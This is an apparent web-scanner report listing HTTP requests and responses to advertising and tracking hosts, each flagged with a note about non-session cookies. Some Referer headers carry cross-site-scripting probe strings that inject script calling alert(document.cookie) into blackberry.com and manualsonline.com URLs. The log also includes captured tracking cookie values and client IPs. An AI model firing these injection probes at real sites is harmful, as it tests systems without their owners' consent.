GET /is/us.blackberry.com?U=/assets_refresh/images/dropNavArrow.png&V=3-wtrzWKMz5TRDi%2fSd+CSqwZrU0+tOXRhkdjDeSgoXXKsKt5tkWeZJR6ejK+C%2fyzfo&I=28F5F496E208D76&D=blackberry.com&01AD=1& HTTP/1.1 Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://us.blackberry.com/smartphones/94178%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed0d62204af5/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 01AI=2-2-25EB5C6599E919113732004AA184A52EB733C740467AAF1D7D81573472EEC61D-9096F2ABE2A1219AAEF0C5B86F175ABE372822FF2ED8C84CDF5447BE0CBE5075
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://us.blackberry.com/assets_refresh/images/dropNavArrow.png?01AD=3aHKJGBey5UiG2d2rLy9DNRi960kdX5X5YBju1dsrFZME9vXtP4bUsw&01RI=28F5F496E208D76&01NA= Expires: Sun, 06 Feb 2011 13:32:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 13:32:25 GMT Connection: close Set-Cookie: 01AI=2-2-E6B4582CF8328068796C2B5053C28D2C377E8430D1A1C755D330840B4F6A6B0A-676C59CB938D0430952A82220209EB8847971233F1926F5A520082B9D9775BCB; expires=Mon, 06-Feb-2012 13:32:25 GMT; path=/; domain=.abmr.net P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/ck/14302-119028-23636-2 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113; svid=517004695355;
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Set-Cookie: mojo2=14302:23636; expires=Tue, 5-Feb-2013 5:38:22 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://www.constantcontact.com/email-marketing/index.jsp?cc=CLK_14302119028236362 Content-Length: 0 Date: Sat, 05 Feb 2011 22:43:24 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/ck/9700-118565-26469-2 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113; svid=517004695355;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Set-Cookie: mojo2=9700:26469; expires=Wed, 6-Feb-2013 6:25:17 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Content-Type: text/html Content-Length: 478 Date: Sun, 06 Feb 2011 16:00:26 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/js/14302-119028-23636-2?mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/14302:28901/1551:17023/11293:3113
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Set-Cookie: mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113; expires=Tue, 5-Feb-2013 5:03:01 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://img.mediaplex.com/content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&placementid=14302119028236362& Content-Length: 0 Date: Sat, 05 Feb 2011 22:25:40 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/nc/14302-119028-23636-2 HTTP/1.1 Host: altfarm.mediaplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113; svid=517004695355;
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 Set-Cookie: mojo2=14302:23636; expires=Tue, 5-Feb-2013 6:09:26 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://www.constantcontact.com/email-marketing/index.jsp?cc=CLK_14302119028236362 Content-Length: 0 Date: Sat, 05 Feb 2011 22:43:18 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d852910/8/40051907/decide.php?ord=1296942847 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296999600.136,wait-%3E10000,&1296999637491 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; BMX_G=method->-1,ts->1296999600; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: image/gif Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296999600%2E136%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com; Content-length: 42 P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25198
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: axptravel.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110205214753 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sat, 05 Feb 2011 21:47:55 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Mon, 04-Feb-2013 21:47:55 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p HTTP/1.1 Host: b.scorecardresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UID=1f00d615-24.143.206.88-1294170954;
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sat, 05 Feb 2011 22:44:03 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Mon, 04-Feb-2013 22:44:03 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=4&c2=p68511049&c3=264255445&c4=185637072&c5=1&c6=6&c7=mon%20jan%2031%2016%3A31%3A23%202011&c8=http%3A%2F%2Fredacted%2FMRT%2Fiview%2F264255445%2Fdirect%3Bwi.300%3Bhi.250%2F01%2F1354764918%3Fclick%3Dhttp%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253DL%2526ai%253DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%2526num%253D1%2526sig%253DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%2526client%253Dca-pub-7786708287155161%2526adurl%253D&c9=DYN_Launch_Adoption_300x250_v2&c10=&c15=&1296999637359 HTTP/1.1 Host: b.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; BMX_G=method->-1,ts->1296999600; BMX_3PC=1
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 06 Feb 2011 13:40:00 GMT Connection: close Set-Cookie: UID=1d29d89e-72.246.30.75-1294456810; expires=Tue, 05-Feb-2013 13:40:00 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /al.asp?ts=20110206132315&adid=401622%2C401622%2C401622&cc=us&di=29166142%2C28321520%2C28321702&hk=1&ipid=12630&mh=167defd4b82c3759d8e6179eb5de4354&pid=2%2C2%2C2&pvm=b60133d74d36fa666d2419a757f62f74&pvu=F09FDD7F3F444C1FA642829D016326B5&rcc=us&so=0&syid=0%2C0%2C0&uf=0%2C0%2C0&ur=0%2C0%2C0&kp=328%2C930%3B336%2C984%3B245%2C1284%3B&prf=ll%3A1385%7Cintl%3A1992%7Cpreprochrome%3A6%7Cgetconchrome%3A27%7Cadvint%3A2035%7Cadvl%3A2035%7Ctl%3A2151&jscallback=$iTXT.js.callback1 HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:22:40 GMT; Path=/ Content-Type: text/javascript Content-Length: 38 Date: Sun, 06 Feb 2011 13:22:40 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intellitxt/front.asp?ipid=12630 HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gQAAAEt99ts1wA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJbEgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:28 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJbEgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:28 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 13:21:27 GMT Content-Length: 10685
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogs.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: bookmarks.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:46:09 GMT Set-Cookie: B=09agn1l6krkph&b=3&s=ud; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Location: https://login.yahoo.com/config/login?.src=bmk2&.intl=us&.done=http%3A%2F%2Fbookmarks.yahoo.com%2F Set-Cookie: BM=s=LDVsdFYCatO4ydCGoEx.tvU_iJRm7U79Rm8ZBWzQWig9Jua.4WPHLMYOfETs9WsebSGQKwKvJhaD2Ss827uiYbPTNOu8IEabjNdTarxICXCpI.pIctl0_oBjRh.gfwu_g5Hd0M4JdVsM2h0OBeqR&u=ki2BuH0CatOne_jM4iqfgUJ6xVkQN9m96VK.qXug1XT2CnidwyTN_4VV3w--; path=/; domain=.bookmarks.yahoo.com Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 270
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 07-May-2011 11:00:06 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 11:00:06 GMT; domain=.serving-sys.com; path=/ P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 06 Feb 2011 16:00:06 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
